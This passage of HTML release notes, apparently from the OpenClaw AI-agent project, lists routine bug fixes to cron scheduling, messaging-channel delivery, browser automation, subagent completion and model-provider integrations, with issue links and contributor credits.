<li>MiniMax music generation: switch the bundled default model from the unsupported <code>music-2.5+</code> id to the current <code>music-2.6</code> API model. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245010440" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64870/hovercard" href="https://github.com/openclaw/openclaw/issues/64870">#64870</a> and addresses the music default from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215652478" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62315/hovercard" href="https://github.com/openclaw/openclaw/issues/62315">#62315</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/noahclanman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/noahclanman">@noahclanman</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/edwardzheng1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/edwardzheng1">@edwardzheng1</a>.</li>
<li>Cron: record jobs interrupted by a gateway restart as failed at their original <code>runningAtMs</code>, skip unsafe startup replay, and disable interrupted one-shot jobs so they show a visible failure instead of silently disappearing or duplicating work. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4187207893" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59056" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59056/hovercard" href="https://github.com/openclaw/openclaw/issues/59056">#59056</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207476732" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61343" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61343/hovercard" href="https://github.com/openclaw/openclaw/issues/61343">#61343</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4231039858" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63657" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63657/hovercard" href="https://github.com/openclaw/openclaw/issues/63657">#63657</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4190617901" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59301" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59301/hovercard" href="https://github.com/openclaw/openclaw/issues/59301">#59301</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ponchoooPenguin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ponchoooPenguin">@ponchoooPenguin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/daemic24/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/daemic24">@daemic24</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/myradon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/myradon">@myradon</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hikiwibot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hikiwibot">@hikiwibot</a>.</li>
<li>Cron tool: recover flat top-level schedule shorthand such as <code>cron</code>, <code>tz</code>, and <code>staggerMs</code> before gateway validation, so model-generated cron add/update calls preserve cron jitter settings. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tyxben/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tyxben">@tyxben</a>.</li>
<li>Cron: hydrate flat legacy job rows with top-level <code>cron</code>, <code>tz</code>, <code>session</code>, and <code>message</code> fields into canonical schedule, target, and payload objects before startup recomputes run times. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4059364525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43351" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43351/hovercard" href="https://github.com/openclaw/openclaw/issues/43351">#43351</a>.</li>
<li>Agents/replies: let pending group chat history trigger bare mentioned turns without treating metadata-only inbound context as user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327616390" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71489" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71489/hovercard" href="https://github.com/openclaw/openclaw/issues/71489">#71489</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327739393" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71520" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71520/hovercard" href="https://github.com/openclaw/openclaw/pull/71520">#71520</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</li>
<li>Google media generation: strip a configured trailing <code>/v1beta</code> from Google music/video provider base URLs before calling the Google GenAI SDK, preventing doubled <code>/v1beta/v1beta</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226005033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63240" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63240/hovercard" href="https://github.com/openclaw/openclaw/issues/63240">#63240</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226196460" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63258" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63258/hovercard" href="https://github.com/openclaw/openclaw/pull/63258">#63258</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hybirdss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hybirdss">@Hybirdss</a>.</li>
<li>Discord: restore direct-message voice-note preflight transcription and classify URL-only Ogg/Opus voice attachments as audio while skipping partial attachments without usable URLs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4207287932" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61314" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61314/hovercard" href="https://github.com/openclaw/openclaw/issues/61314">#61314</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244552483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64803" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64803/hovercard" href="https://github.com/openclaw/openclaw/issues/64803">#64803</a>.</li>
<li>Plugins/build: copy bundled plugin skill trees into <code>dist-runtime</code>, broaden Windows symlink-copy fallbacks, and fingerprint runtime dependencies from <code>lstat</code> so symlink-like directory entries cannot crash staging.</li>
<li>Google Chat: preserve reply text when a typing indicator message is deleted or can no longer be updated, so media captions and first text chunks are resent instead of silently disappearing. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327650702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71498" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71498/hovercard" href="https://github.com/openclaw/openclaw/pull/71498">#71498</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colin-lgtm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colin-lgtm">@colin-lgtm</a>.</li>
<li>Cron: tolerate malformed legacy job rows in startup, main-session system-event payloads, and human-readable <code>cron list</code> output so missing <code>state</code>, <code>payload.text</code>, or display fields no longer crash the scheduler or CLI. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256052544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66016" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66016/hovercard" href="https://github.com/openclaw/openclaw/issues/66016">#66016</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254208406" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65916" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65916/hovercard" href="https://github.com/openclaw/openclaw/issues/65916">#65916</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237081136" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64137/hovercard" href="https://github.com/openclaw/openclaw/issues/64137">#64137</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4173024002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57872" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57872/hovercard" href="https://github.com/openclaw/openclaw/issues/57872">#57872</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4197639692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59968" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59968/hovercard" href="https://github.com/openclaw/openclaw/issues/59968">#59968</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233361564" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63813" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63813/hovercard" href="https://github.com/openclaw/openclaw/issues/63813">#63813</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4120171658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52804" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52804/hovercard" href="https://github.com/openclaw/openclaw/issues/52804">#52804</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4057886163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/43163" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/43163/hovercard" href="https://github.com/openclaw/openclaw/issues/43163">#43163</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327695420" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71509" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71509/hovercard" href="https://github.com/openclaw/openclaw/pull/71509">#71509</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>CLI/models: make <code>openclaw models scan</code> fall back to public OpenRouter free-model metadata when no <code>OPENROUTER_API_KEY</code> is configured, avoid config secret resolution for explicit <code>--no-probe</code> scans, and apply the scan timeout to the OpenRouter catalog request.</li>
<li>Feishu: keep streaming cards to one live card per turn, flush throttled card edits after meaningful text boundaries, and skip exact block/partial repeats so tool-heavy replies do not duplicate card output. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/allan0509/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/allan0509">@allan0509</a>.</li>
<li>Feishu: finish the streaming-card duplicate closeout by stripping leaked reasoning tags, preserving cross-block partial snapshots, enabling topic-thread streaming cards, omitting the generic <code>main</code> card header, surfacing transient tool/compaction status, and cleaning streaming state after close failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sesame437/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sesame437">@sesame437</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vicky-v7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vicky-v7">@Vicky-v7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maoku-family/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maoku-family">@maoku-family</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pengxiao-Wang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pengxiao-Wang">@Pengxiao-Wang</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Maple778/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Maple778">@Maple778</a>.</li>
<li>Telegram: recover incomplete partial-stream previews by falling back to a final send when an ambiguous final edit failure would otherwise retain a strict prefix of the answer. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327777647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71525" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71525/hovercard" href="https://github.com/openclaw/openclaw/issues/71525">#71525</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327970972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71554" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71554/hovercard" href="https://github.com/openclaw/openclaw/pull/71554">#71554</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sahilsatralkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sahilsatralkar">@sahilsatralkar</a>.</li>
<li>Control UI/chat: collapse assistant token/model context details behind an explicit Context disclosure and show full dates in message footers, making historical transcript timing clear without noisy default metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326580782" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71337" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71337/hovercard" href="https://github.com/openclaw/openclaw/pull/71337">#71337</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BunsDev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BunsDev">@BunsDev</a>.</li>
<li>OpenAI/Codex OAuth: explain <code>unsupported_country_region_territory</code> token-exchange failures with a proxy/region hint instead of surfacing a generic OAuth error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4109246729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51175" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51175/hovercard" href="https://github.com/openclaw/openclaw/issues/51175">#51175</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327668763" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71501" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71501/hovercard" href="https://github.com/openclaw/openclaw/pull/71501">#71501</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wulala-xjj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wulala-xjj">@wulala-xjj</a>.</li>
<li>Browser/Linux: fall back to headless mode for local managed profiles on hosts without a display server, while preserving explicit per-profile headed overrides and reporting the headless source. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4205308957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60953" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60953/hovercard" href="https://github.com/openclaw/openclaw/pull/60953">#60953</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rrpsantos/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rrpsantos">@rrpsantos</a>.</li>
<li>Telegram: remove the startup persisted-offset <code>getUpdates</code> preflight so polling restarts do not self-conflict before the runner starts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295160026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69304/hovercard" href="https://github.com/openclaw/openclaw/issues/69304">#69304</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303812517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69779" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69779/hovercard" href="https://github.com/openclaw/openclaw/pull/69779">#69779</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chinar-amrutkar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chinar-amrutkar">@chinar-amrutkar</a>.</li>
<li>Telegram: keep the polling stall watchdog active even when grammY reports the runner as not running while its task is still pending, so a rebuilt transport cannot leave <code>getUpdates</code> silent until a manual gateway restart. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291652137" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69064" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69064/hovercard" href="https://github.com/openclaw/openclaw/issues/69064">#69064</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LDLoeb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LDLoeb">@LDLoeb</a>.</li>
<li>Subagents: fall back to direct completion delivery when the parent announce turn finishes without a visible payload, so child results still reach channel-backed requester sessions.</li>
<li>Subagents: tell parent agents to use <code>sessions_yield</code> while waiting for child completion events, preventing GPT-5 fast runs from ending silently after spawning workers.</li>
<li>Browser/Playwright: ignore benign already-handled route races during guarded navigation so browser-page tasks no longer fail when Playwright tears down a route mid-flight. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289338446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68708" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68708/hovercard" href="https://github.com/openclaw/openclaw/pull/68708">#68708</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Steady-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Steady-ai">@Steady-ai</a>.</li>
<li>Browser/CLI: lazy-load browser command groups and plugin runtime services so <code>openclaw browser --help</code> can render without loading the full browser automation stack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248388921" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65400" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65400/hovercard" href="https://github.com/openclaw/openclaw/issues/65400">#65400</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4248899051" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65460" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65460/hovercard" href="https://github.com/openclaw/openclaw/pull/65460">#65460</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4263144074" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66640" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66640/hovercard" href="https://github.com/openclaw/openclaw/pull/66640">#66640</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pandego/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pandego">@pandego</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tianworld/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tianworld">@Tianworld</a>.</li>
<li>Browser/CLI: serve precomputed <code>openclaw browser --help</code> text from CLI startup metadata, avoiding the full plugin/config startup path for the common help invocation.</li>
<li>Browser/downloads: seed managed Chrome profiles with OpenClaw download prefs and capture unmanaged click-triggered downloads under the guarded downloads directory, while explicit download waiters still own their target file. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242367248" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64558" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64558/hovercard" href="https://github.com/openclaw/openclaw/pull/64558">#64558</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Pearcekieser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Pearcekieser">@Pearcekieser</a>.</li>
<li>Browser/Chrome: stop passing redundant <code>--disable-setuid-sandbox</code> when <code>browser.noSandbox</code> is enabled; <code>--no-sandbox</code> remains the effective sandbox opt-out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279830525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67939" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67939/hovercard" href="https://github.com/openclaw/openclaw/pull/67939">#67939</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sebykrueger/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sebykrueger">@sebykrueger</a>.</li>
<li>Browser/client: stop telling agents to permanently avoid the browser after transient timeout or cancellation failures; keep the no-retry hint for persistent unavailable/rate-limit cases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076448290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46505" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/46505/hovercard" href="https://github.com/openclaw/openclaw/pull/46505">#46505</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jriff/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jriff">@jriff</a>.</li>
<li>Browser/aria snapshots: bind <code>format=aria</code> <code>axN</code> refs to live DOM nodes through backend DOM ids when Playwright is available, so follow-up browser actions can use those refs without timing out. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4217034518" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62434" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62434/hovercard" href="https://github.com/openclaw/openclaw/pull/62434">#62434</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrKipler/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrKipler">@MrKipler</a>.</li>
<li>Telegram: prevent duplicate in-process long pollers for the same bot token and add clearer <code>getUpdates</code> conflict diagnostics for external duplicate pollers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4158101646" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56230" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56230/hovercard" href="https://github.com/openclaw/openclaw/issues/56230">#56230</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Co-Messi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Co-Messi">@Co-Messi</a>.</li>
<li>Browser/Linux: detect Chromium-based installs under <code>/opt/google</code>, <code>/opt/brave.com</code>, <code>/usr/lib/chromium</code>, and <code>/usr/lib/chromium-browser</code> before asking users to set <code>browser.executablePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085382761" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48563" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/48563/hovercard" href="https://github.com/openclaw/openclaw/pull/48563">#48563</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lupuletic/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lupuletic">@lupuletic</a>.</li>
<li>Sessions/browser: close tracked browser tabs when idle, daily, <code>/new</code>, or <code>/reset</code> session rollover archives the previous transcript, preventing tabs from leaking past the old session. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jakozloski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jakozloski">@jakozloski</a>.</li>
<li>Sessions/forking: fall back to transcript-estimated parent token counts when cached totals are stale or missing, so oversized thread forks start fresh instead of cloning the full parent transcript. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jalehman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jalehman">@jalehman</a>.</li>
<li>OpenAI/Codex: send Codex Responses system prompts through top-level <code>instructions</code> while preserving the existing native Codex payload controls.</li>
<li>MCP/CLI: retire bundled MCP runtimes at the end of one-shot <code>openclaw agent</code> and <code>openclaw infer model run</code> gateway/local executions, so repeated scripted runs do not accumulate stdio MCP child processes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327469009" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71457" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71457/hovercard" href="https://github.com/openclaw/openclaw/issues/71457">#71457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/spartoviMD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/spartoviMD">@spartoviMD</a>.</li>
<li>OpenAI/Codex image generation: canonicalize legacy <code>openai-codex.baseUrl</code> values such as <code>https://chatgpt.com/backend-api</code> to the Codex Responses backend before calling <code>gpt-image-2</code>, matching the chat transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327474967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71460" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71460/hovercard" href="https://github.com/openclaw/openclaw/issues/71460">#71460</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GodsBoy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GodsBoy">@GodsBoy</a>.</li>
<li>Control UI: make <code>/usage</code> use the fresh context snapshot for context percentage, and include cache-write tokens in the Usage overview cache-hit denominator. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4080148005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47885" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47885/hovercard" href="https://github.com/openclaw/openclaw/issues/47885">#47885</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/imwyvern/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/imwyvern">@imwyvern</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Ante042/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Ante042">@Ante042</a>.</li>
<li>GitHub Copilot: preserve encrypted Responses reasoning item IDs during replay so Copilot can validate encrypted reasoning payloads across requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4327393792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71448" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71448/hovercard" href="https://github.com/openclaw/openclaw/pull/71448">#71448</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a410979729-sys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a410979729-sys">@a410979729-sys</a>.</li>
<li>GitHub Copilot: never rewrite connection-bound reasoning item IDs regardless of whether <code>encrypted_content</code> is present, fixing a 400 "Encrypted content item_id did not match" error with <code>gpt-5.3-codex</code> and future Codex models that fall through to the forward-compat catch-all with <code>reasoning: false</code>. Also recognize Codex-named models as reasoning-capable so they inherit the correct capability flags. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289536760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68735" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68735/hovercard" href="https://github.com/openclaw/openclaw/issues/68735">#68735</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/InvalidPandaa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/InvalidPandaa">@InvalidPandaa</a>.</li>
